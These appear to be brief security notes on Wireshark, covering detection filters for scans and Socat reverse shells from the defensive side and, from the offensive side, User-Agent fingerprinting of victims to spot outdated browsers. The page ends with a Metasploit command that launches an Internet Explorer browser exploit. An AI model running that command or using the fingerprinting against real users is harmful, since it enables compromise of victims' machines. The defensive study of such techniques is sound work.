Weaponizing Wireshark
Wireshark – Defensive Perspective
Wireshark is a powerful network analysis tool that defenders can use to capture and inspect traffic generated by offensive tools such as Nmap and Socat. It allows visibility into network-level activities that may indicate reconnaissance or exploitation attempts.
Common Uses in Defense:
Detecting scanning activity (e.g., unusual port probes from Nmap).
Identifying unencrypted command execution (e.g., reverse shells via Socat).
Monitoring unauthorized use of commonly trusted ports (e.g., cleartext data on port 22 or 443).
Example filters for analysis:
tcp.port == 22 && tcp.len > 0
tcp contains "cmd.exe"Wireshark – Offensive Perspective
While typically used for defense, Wireshark also has value in offensive security operations, particularly during client-side attacks.
Use Case: Fingerprinting the Victim's Environment
When an attacker entices a user to visit a malicious webpage, the attacker's system can capture and analyze HTTP headers, including the User-Agent string, to determine the browser and system configuration.
Captured example:
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729)Analysis:
MSIE 7.0 indicates Internet Explorer 7, an outdated browser with known vulnerabilities.
.NET CLR versions suggest older runtime environments.
This information can be used to assess exploitability for attacks such as drive-by downloads or legacy browser exploits.
Summary
Defensive
Detect and analyze malicious network activity
Monitor traffic from tools like Nmap and Socat
Offensive
Gather client system/browser information
Inspect User-Agent strings to identify outdated software
msfconsole -x "use /exploit/windows/browser/ie unsafe_scripting; set ALLOWPROMPT true; set URIPATH /evil; info; run"Last updated